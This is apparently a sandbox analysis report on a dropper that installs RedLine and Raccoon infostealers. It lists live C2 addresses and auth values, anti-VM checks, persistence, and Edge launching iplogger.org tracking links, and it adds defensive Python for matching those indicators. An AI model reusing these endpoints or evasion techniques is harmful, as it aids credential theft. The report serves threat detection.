Analysis
max time kernel: 105s
max time network: 153s
platform: windows10-2004_x64
resource: win10v2004-20220721-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
submitted: 09-08-2022 08:45 (9 August 2022)
Static task: static1
Behavioral task: behavioral1
Sample: 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe
Resource: win10v2004-20220721-en
General
Target: 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe
Size: 890KB
MD5: 185b09878a7c9be2f5ab261f5244a8a0
SHA1: 2255e5050fc8867ecc7974727dfcad2eb1d8aca0
SHA256: 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2
SHA512: bf9cc4ec025fbacf2c8faaca3f5eb5fda4adb59e2db4bc6ff015f10361e2f54369d597985da72152103fba19eefe3cc762e6b4ca5be413a454c6c1454570967b
Malware Config
Extracted
  Family: redline
  Botnet: nam3
  C2: 103.89.90.61:18728
  auth_value: 64b900120bbceaa6a9c60e9079492895
Extracted
  Family: redline
  Botnet: 4
  C2: 31.41.244.134:11643
  auth_value: a516b2d034ecd34338f12b50347fbd92
Extracted
  Family: redline
  Botnet: @tag12312341
  C2: 62.204.41.144:14096
  auth_value: 71466795417275fac01979e57016e277
Extracted
  Family: redline
  Botnet: 5076357887
  C2: 195.54.170.157:16525
  auth_value: 0dfaff60271d374d0c206d19883e06f3
Extracted
  Family: redline
  Botnet: alfa
  C2: 46.175.148.142:32178
  auth_value: 5f6c4b42c0bce31d7557ce1726a401c5
Extracted
  Family: raccoon
  Botnet: f0c8034c83808635df0d9d8726d1bfd6
  C2: http://45.95.11.158/
Extracted
  Family: raccoon
  Botnet: afb5c633c4650f69312baef49db9dfa4
  C2: http://77.73.132.74
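The seven configs above give five RedLine host:port C2s and two Raccoon HTTP C2s. The Python below is an added example, not part of the sandbox report: it normalises those values into (host, port) indicators, exports them as a flat watchlist, and scans connection records for them, rating an exact host:port match higher than a host-only match (a known C2 host on a rotated port). The config values are copied from the report; the connection records and their tab-separated conn.log-style layout are constructed for the demonstration.

```python
"""Match the C2 endpoints from the extracted configs against connection logs.

Added example; not part of the sandbox report. The config values below are
copied from the report's Malware Config section. The connection records and
their tab-separated layout are constructed for the demonstration.
"""
from urllib.parse import urlparse

EXTRACTED_CONFIGS = [
    {"family": "redline", "botnet": "nam3",         "c2": "103.89.90.61:18728",   "auth_value": "64b900120bbceaa6a9c60e9079492895"},
    {"family": "redline", "botnet": "4",            "c2": "31.41.244.134:11643",  "auth_value": "a516b2d034ecd34338f12b50347fbd92"},
    {"family": "redline", "botnet": "@tag12312341", "c2": "62.204.41.144:14096",  "auth_value": "71466795417275fac01979e57016e277"},
    {"family": "redline", "botnet": "5076357887",   "c2": "195.54.170.157:16525", "auth_value": "0dfaff60271d374d0c206d19883e06f3"},
    {"family": "redline", "botnet": "alfa",         "c2": "46.175.148.142:32178", "auth_value": "5f6c4b42c0bce31d7557ce1726a401c5"},
    {"family": "raccoon", "botnet": "f0c8034c83808635df0d9d8726d1bfd6", "c2": "http://45.95.11.158/"},
    {"family": "raccoon", "botnet": "afb5c633c4650f69312baef49db9dfa4", "c2": "http://77.73.132.74"},
]


def c2_endpoint(c2):
    """Normalise a C2 string to (host, port).

    RedLine stores host:port; Raccoon stores an HTTP(S) URL, where a missing
    port means the scheme default.
    """
    if "://" in c2:
        u = urlparse(c2)
        return u.hostname, u.port or (443 if u.scheme == "https" else 80)
    host, _, port = c2.rpartition(":")
    return host, int(port)


def ioc_list(configs=EXTRACTED_CONFIGS):
    """Flat, sorted host:port list for a blocklist or a SIEM watchlist."""
    return sorted("%s:%d" % c2_endpoint(cfg["c2"]) for cfg in configs)


def build_ioc_index(configs):
    """Two lookups: exact (host, port) and host-only, so a C2 host seen on a
    rotated port is still surfaced, at lower confidence."""
    by_endpoint, by_host = {}, {}
    for cfg in configs:
        host, port = c2_endpoint(cfg["c2"])
        by_endpoint[(host, port)] = cfg
        by_host.setdefault(host, []).append(cfg)
    return by_endpoint, by_host


# Constructed records, Zeek conn.log-like: ts, uid, src, sport, dst, dport, proto.
SAMPLE_CONN_LOG = "\n".join([
    "1660034700.1\tCabc1\t10.0.0.5\t49712\t103.89.90.61\t18728\ttcp",   # RedLine C2, exact port
    "1660034701.2\tCabc2\t10.0.0.5\t49713\t198.51.100.20\t443\ttcp",    # unrelated traffic
    "1660034702.3\tCabc3\t10.0.0.7\t49801\t45.95.11.158\t80\ttcp",      # Raccoon C2 over HTTP
    "1660034703.4\tCabc4\t10.0.0.9\t49950\t62.204.41.144\t8080\ttcp",   # RedLine C2 host, unexpected port
])


def scan_conn_log(text, configs=EXTRACTED_CONFIGS):
    """Return one hit per record whose destination is a configured C2."""
    by_endpoint, by_host = build_ioc_index(configs)
    hits = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        _ts, uid, src, _sport, dst, dport, _proto = line.split("\t")
        dport = int(dport)
        if (dst, dport) in by_endpoint:
            cfg, confidence = by_endpoint[(dst, dport)], "high"
        elif dst in by_host:
            cfg, confidence = by_host[dst][0], "medium"   # same host, different port
        else:
            continue
        hits.append({"uid": uid, "src": src, "dst": dst, "dport": dport,
                     "family": cfg["family"], "botnet": cfg["botnet"],
                     "confidence": confidence})
    return hits


if __name__ == "__main__":
    print("\n".join(ioc_list()))
    for hit in scan_conn_log(SAMPLE_CONN_LOG):
        print(hit)
```

The host-only index matters in practice: stealer operators rotate ports on a rented VPS far more often than they move to a new address, so a host:port watchlist alone goes stale quickly while the host-only match keeps catching the same infrastructure.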
Signatures
-
Raccoon Stealer payload 6 IoCs
YARA rule family_raccoon matched in (PID 6448 is F0geI.exe and PID 5500 kukurzka9000.exe, per "Executes dropped EXE" below):
  behavioral1/memory/6448-258-0x00000000001E0000-0x00000000001EF000-memory.dmp
  behavioral1/memory/6448-268-0x0000000000400000-0x000000000062B000-memory.dmp
  behavioral1/memory/5500-279-0x00000000022B0000-0x00000000022C6000-memory.dmp
  behavioral1/memory/5500-282-0x0000000000400000-0x0000000000482000-memory.dmp
  behavioral1/memory/6448-288-0x00000000001E0000-0x00000000001EF000-memory.dmp
  behavioral1/memory/6448-293-0x0000000000400000-0x000000000062B000-memory.dmp
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine payload 15 IoCs
YARA rule family_redline matched in five dropped executables (each matched twice, on disk) and in their memory, consistent with the five RedLine configs extracted above:
  C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe (2 matches)
  behavioral1/memory/176-166-0x0000000000B70000-0x0000000000BB4000-memory.dmp
  C:\Program Files (x86)\Company\NewProduct\safert44.exe (2 matches)
  behavioral1/memory/4712-170-0x0000000000330000-0x0000000000374000-memory.dmp
  C:\Program Files (x86)\Company\NewProduct\tag.exe (2 matches)
  behavioral1/memory/6800-257-0x0000000000BA0000-0x0000000000BC0000-memory.dmp
  C:\Program Files (x86)\Company\NewProduct\jshainx.exe (2 matches)
  behavioral1/memory/6680-255-0x0000000000A70000-0x0000000000A90000-memory.dmp
  C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exe (2 matches)
  behavioral1/memory/6956-266-0x0000000000660000-0x0000000000680000-memory.dmp
Enumerates VirtualBox DLL files 2 TTPs 10 IoCs
File opened (read-only) by svchost.exe:
  C:\windows\System32\vboxoglpassthroughspu.dll
  C:\windows\System32\vboxdisp.dll
  C:\windows\System32\vboxhook.dll
  C:\windows\System32\vboxmrxnp.dll
  C:\windows\System32\vboxoglarrayspu.dll
  C:\windows\System32\vboxoglpackspu.dll
  C:\windows\System32\vboxogl.dll
  C:\windows\System32\vboxoglcrutil.dll
  C:\windows\System32\vboxoglerrorspu.dll
  C:\windows\System32\vboxoglfeedbackspu.dll
Looks for VirtualBox drivers on disk 2 TTPs 4 IoCs
File opened (read-only) by svchost.exe:
  C:\windows\System32\Drivers\VBoxMouse.sys
  C:\windows\System32\Drivers\VBoxGuest.sys
  C:\windows\System32\Drivers\VBoxSF.sys
  C:\windows\System32\Drivers\VBoxVideo.sys
Looks for VirtualBox executables on disk 2 TTPs 3 IoCs
File opened (read-only) by svchost.exe:
  C:\windows\System32\vboxservice.exe
  C:\windows\System32\vboxtray.exe
  C:\windows\System32\VBoxControl.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs
File opened for modification by conhost.exe: C:\Windows\system32\drivers\etc\hosts
This is the hosts file rather than a driver: rewriting it lets the malware redirect or black-hole name lookups (typically for update or security-vendor domains). The report does not show what was written.
Executes dropped EXE 13 IoCs
  PID 176   namdoitntn.exe
  PID 5080  real.exe
  PID 4712  safert44.exe
  PID 5500  kukurzka9000.exe
  PID 6448  F0geI.exe
  PID 6680  tag.exe
  PID 6800  jshainx.exe
  PID 6956  MouseAtHome.exe
  PID 7056  me.exe
  PID 3688  WindowsDefender.exe
  PID 3628  Windows.exe
  PID 1256  Windows Defender.exe
  PID 6188  svchost.exe
svchost.exe (PID 6188), Windows.exe, WindowsDefender.exe and "Windows Defender.exe" are dropped files with system-like names, not the Windows components; the svchost.exe referenced by the anti-VM signatures is this PID.
Looks for VMWare drivers on disk 2 TTPs 3 IoCs
File opened (read-only) by svchost.exe:
  C:\windows\System32\Drivers\vmusbmouse.sys
  C:\windows\System32\Drivers\Vmmouse.sys
  C:\windows\System32\Drivers\vmci.sys
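The three VirtualBox signatures and the VMware signature above are one technique: the dropped binary named svchost.exe (PID 6188, listed under "Executes dropped EXE", so not the Windows service host) opens guest-tooling files to decide whether it is inside a VM. A detection should treat the probes together rather than alert on single file opens, and should exempt the guest-additions processes that legitimately touch their own files. The Python below is an added example, not from the report: it groups the artifact paths into indicator families, scores each process by how many families and distinct paths it touched, and applies that exemption. The event records are constructed from the paths in the signatures; the (process, pid, op, path) shape and the exemption list are assumptions, not a real sensor schema.

```python
"""Score processes that probe for hypervisor guest artifacts on disk.

Added example; not from the sandbox report. Event records are constructed
from the file paths in the report's anti-VM signatures; the record shape
(process, pid, op, path) and the exemption list are assumptions.
"""
import re
from collections import defaultdict

# Artifact families. Names come from the report's IoCs; the grouping is the example's own.
HYPERVISOR_ARTIFACTS = {
    "virtualbox_dll":    re.compile(r"\\system32\\vbox[^\\]*\.dll$", re.I),
    "virtualbox_driver": re.compile(r"\\system32\\drivers\\vbox[^\\]*\.sys$", re.I),
    "virtualbox_exe":    re.compile(r"\\system32\\(vboxservice|vboxtray|vboxcontrol)\.exe$", re.I),
    "vmware_driver":     re.compile(r"\\system32\\drivers\\(vmusbmouse|vmmouse|vmci)\.sys$", re.I),
}

# Guest-tooling processes that open these files as part of normal operation (assumption).
GUEST_TOOLING_PROCESSES = ("vboxtray.exe", "vboxservice.exe", "vmtoolsd.exe")

# Constructed events: (process image name, pid, operation, path).
SAMPLE_EVENTS = [
    ("svchost.exe", 6188, "open", r"C:\windows\System32\vboxoglpassthroughspu.dll"),
    ("svchost.exe", 6188, "open", r"C:\windows\System32\vboxdisp.dll"),
    ("svchost.exe", 6188, "open", r"C:\windows\System32\Drivers\VBoxMouse.sys"),
    ("svchost.exe", 6188, "open", r"C:\windows\System32\vboxservice.exe"),
    ("svchost.exe", 6188, "open", r"C:\windows\System32\Drivers\vmci.sys"),
    ("svchost.exe", 6188, "open", r"C:\windows\System32\kernel32.dll"),     # ordinary DLL load, ignored
    ("VBoxTray.exe", 1234, "open", r"C:\Windows\System32\VBoxHook.dll"),    # guest additions touching itself
    ("explorer.exe", 4000, "open", r"C:\Users\Admin\Desktop\notes.txt"),    # unrelated
]


def classify(path):
    """Return the artifact family a path belongs to, or None."""
    for family, rx in HYPERVISOR_ARTIFACTS.items():
        if rx.search(path):
            return family
    return None


def score_hypervisor_probes(events, min_families=2, min_paths=4):
    """Flag (process, pid) pairs that probe several artifact families or many
    distinct artifact paths. A single probe is weak evidence; a sweep across
    DLLs, drivers and executables of two hypervisors is not."""
    probes = defaultdict(lambda: {"families": set(), "paths": set()})
    for proc, pid, op, path in events:
        if op != "open":
            continue
        family = classify(path)
        if family is None:
            continue
        probes[(proc, pid)]["families"].add(family)
        probes[(proc, pid)]["paths"].add(path.lower())

    flagged = {}
    for (proc, pid), seen in probes.items():
        if proc.lower() in GUEST_TOOLING_PROCESSES:
            continue
        if len(seen["families"]) >= min_families or len(seen["paths"]) >= min_paths:
            flagged[(proc, pid)] = {
                "families": sorted(seen["families"]),
                "path_count": len(seen["paths"]),
            }
    return flagged


if __name__ == "__main__":
    for key, detail in score_hypervisor_probes(SAMPLE_EVENTS).items():
        print(key, detail)
```

Keying on (process name, pid) rather than name alone is deliberate: the flagged process here is called svchost.exe, and a rule keyed on image name would either drown in the real service hosts or have to exclude the name the malware chose for exactly that reason.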
Possible privilege escalation attempt 2 IoCs
  PID 1184  takeown.exe
  PID 3664  icacls.exe
takeown.exe followed by icacls.exe is the usual pair for taking ownership of a protected file and rewriting its ACL; the command lines are not included in this report excerpt.
Stops running service(s) 3 TTPs
UPX-packed regions (YARA rule upx) in PID 3628 Windows.exe and PID 6188 svchost.exe; the 0x00007FF6... base of the latter shows it is a 64-bit image:
  behavioral1/memory/3628-315-0x0000000000400000-0x0000000000736000-memory.dmp
  behavioral1/memory/3628-319-0x0000000000400000-0x0000000000736000-memory.dmp
  behavioral1/memory/6188-328-0x00007FF68EAF0000-0x00007FF68EE6B000-memory.dmp
  behavioral1/memory/6188-330-0x00007FF68EAF0000-0x00007FF68EE6B000-memory.dmp
Checks computer location settings 2 TTPs 3 IoCs
Looks up the country code configured in the registry, likely a geofence.
Key value queried: \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation, by:
  WindowsDefender.exe
  125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe
  MouseAtHome.exe
Modifies file permissions 1 TTPs 2 IoCs
  PID 1184  takeown.exe
  PID 3664  icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 1 IoCs
Key created by msedge.exe: \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Software\Microsoft\Windows\CurrentVersion\Run
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Legitimate hosting services abused for malware hosting/C2 1 TTPs
Suspicious use of SetThreadContext 1 IoCs
PID 6308 conhost.exe set the thread context of PID 2356 conhost.exe.
A process redirecting a thread in a freshly created copy of itself is the process-hollowing pattern: the child is started suspended, its image is replaced, and SetThreadContext points the main thread at the new entry point.
Drops file in Program Files directory 12 IoCs
File created by Windows.exe:
  C:\Program Files\Google\Chrome\Application\launcher.exe
File opened for modification by 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe:
  C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe
  C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe
  C:\Program Files (x86)\Company\NewProduct\F0geI.exe
  C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exe
  C:\Program Files (x86)\Company\NewProduct\me.exe
  C:\Program Files (x86)\Company\NewProduct\real.exe
  C:\Program Files (x86)\Company\NewProduct\safert44.exe
  C:\Program Files (x86)\Company\NewProduct\tag.exe
  C:\Program Files (x86)\Company\NewProduct\jshainx.exe
File opened for modification by setup.exe (Edge's own setup metrics):
  C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220809104555.pma
File created by setup.exe:
  C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\ed9cd2bb-02c7-4e5b-9e76-d145a403ae3a.tmp
Drops file in Windows directory 4 IoCs
conhost.exe:
  File created: C:\Windows\Tasks\dialersvc32.job
  File opened for modification: C:\Windows\Tasks\dialersvc32.job
  File created: C:\Windows\Tasks\dialersvc64.job
  File opened for modification: C:\Windows\Tasks\dialersvc64.job
.job files under C:\Windows\Tasks are legacy (Task Scheduler 1.0) task definitions, so these two files are a persistence mechanism; the task commands are not shown in this excerpt.
Launches sc.exe 5 IoCs
sc.exe is the Windows utility for controlling services on the system.
  PID 1116  sc.exe
  PID 5728  sc.exe
  PID 4092  sc.exe
  PID 3000  sc.exe
  PID 5380  sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). The sandbox's generic note for this signature calls it likely ransomware behaviour; the payloads identified in this run are infostealers (RedLine, Raccoon) and no encryption activity is recorded, so this signature on its own is not evidence of ransomware.
Program crash 1 IoCs
WerFault.exe (PID 6808) handled a crash of F0geI.exe (PID 6448), one of the two processes with Raccoon matches in memory.
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
real.exe (PID 5080):
  Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
Enumerates system info in registry 2 TTPs 3 IoCs
msedge.exe:
  Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName
These reads are attributed to the real Edge process launched by the sample, so they are likely browser telemetry rather than the malware's own sandbox check.
Modifies registry class 1 IoCs
Key created by msedge.exe: \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\
Modifies registry key 1 TTPs 9 IoCs
reg.exe launched nine times, PIDs: 7160, 4088, 5616, 4348, 2476, 3140, 6000, 5640, 6112
Suspicious behavior: EnumeratesProcesses 49 IoCs
PID and process (number of events in parentheses):
  5240 msedge.exe (2)
  5248 msedge.exe (2)
  5552 msedge.exe (2)
  5764 msedge.exe (2)
  5560 msedge.exe (2)
  5568 msedge.exe (2)
  5536 msedge.exe (2)
  5544 msedge.exe (2)
  2032 msedge.exe (2)
  5080 real.exe (2)
  4704 identity_helper.exe (2)
  6680 tag.exe (2)
  6800 jshainx.exe (2)
  4712 safert44.exe (2)
  6956 MouseAtHome.exe (2)
  3628 Windows.exe (2)
  6012 powershell.exe (3)
  176 namdoitntn.exe (2)
  7004 powershell.exe (3)
  6188 svchost.exe (2)
  5520 powershell.exe (3)
  6308 conhost.exe (2)
  5200 powershell.exe (2)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
  2032 msedge.exe (11 events)
Suspicious use of AdjustPrivilegeToken 18 IoCs
Token enabled, PID and process:
  SeDebugPrivilege        6680 tag.exe
  SeDebugPrivilege        6800 jshainx.exe
  SeDebugPrivilege        4712 safert44.exe
  SeDebugPrivilege        6956 MouseAtHome.exe
  SeDebugPrivilege        6012 powershell.exe
  SeDebugPrivilege        176 namdoitntn.exe
  SeDebugPrivilege        7004 powershell.exe
  SeDebugPrivilege        5520 powershell.exe
  SeDebugPrivilege        6308 conhost.exe
  SeShutdownPrivilege     3520 powercfg.exe
  SeCreatePagefilePrivilege 3520 powercfg.exe
  SeShutdownPrivilege     3176 powercfg.exe
  SeCreatePagefilePrivilege 3176 powercfg.exe
  SeShutdownPrivilege     3876 powercfg.exe
  SeCreatePagefilePrivilege 3876 powercfg.exe
  SeShutdownPrivilege     5740 powercfg.exe
  SeCreatePagefilePrivilege 5740 powercfg.exe
  SeDebugPrivilege        5200 powershell.exe
Suspicious use of FindShellTrayWindow 2 IoCs
  2032 msedge.exe (2 events)
Suspicious use of WriteProcessMemory 64 IoCs
Writer PID (process) -> target PID (process); PID 2388 is the submitted sample 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe. Repeated events are collapsed with a count:
  2388 (sample) -> 3484 (msedge.exe) (2)
  2388 (sample) -> 1468 (msedge.exe) (2)
  1468 (msedge.exe) -> 2532 (msedge.exe) (2)
  2388 (sample) -> 4436 (msedge.exe) (2)
  3484 (msedge.exe) -> 4836 (msedge.exe) (2)
  4436 (msedge.exe) -> 4988 (msedge.exe) (2)
  2388 (sample) -> 4596 (msedge.exe) (2)
  4596 (msedge.exe) -> 4204 (msedge.exe) (2)
  2388 (sample) -> 4344 (msedge.exe) (2)
  4344 (msedge.exe) -> 4888 (msedge.exe) (2)
  2388 (sample) -> 2032 (msedge.exe) (2)
  2032 (msedge.exe) -> 4356 (msedge.exe) (2)
  2388 (sample) -> 4064 (msedge.exe) (2)
  4064 (msedge.exe) -> 4944 (msedge.exe) (2)
  2388 (sample) -> 1120 (msedge.exe) (2)
  1120 (msedge.exe) -> 3468 (msedge.exe) (2)
  2388 (sample) -> 176 (namdoitntn.exe) (3)
  2388 (sample) -> 5080 (real.exe) (3)
  2388 (sample) -> 4712 (safert44.exe) (3)
  2032 (msedge.exe) -> 1156 (msedge.exe) (21)
  4596 (msedge.exe) -> 1544 (msedge.exe) (2)
Every pair is a parent writing into a child it has just created (compare the process tree below), which is what ordinary process start-up looks like to the sandbox; these entries alone are not evidence of injection. The SetThreadContext entry above (conhost.exe -> conhost.exe) is the stronger injection indicator in this report.
Processes
-
C:\Users\Admin\AppData\Local\Temp\125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe"C:\Users\Admin\AppData\Local\Temp\125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe"1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RyjC42⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9c39946f8,0x7ff9c3994708,0x7ff9c39947183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,17767413840200284536,5828161942537074106,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,17767413840200284536,5828161942537074106,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1A4aK42⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9c39946f8,0x7ff9c3994708,0x7ff9c39947183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,11770811137516348281,4843849023375438019,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,11770811137516348281,4843849023375438019,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RLtX42⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9c39946f8,0x7ff9c3994708,0x7ff9c39947183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,11887193749477432366,14851517912531595843,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,11887193749477432366,14851517912531595843,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RCgX42⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9c39946f8,0x7ff9c3994708,0x7ff9c39947183⤵
-
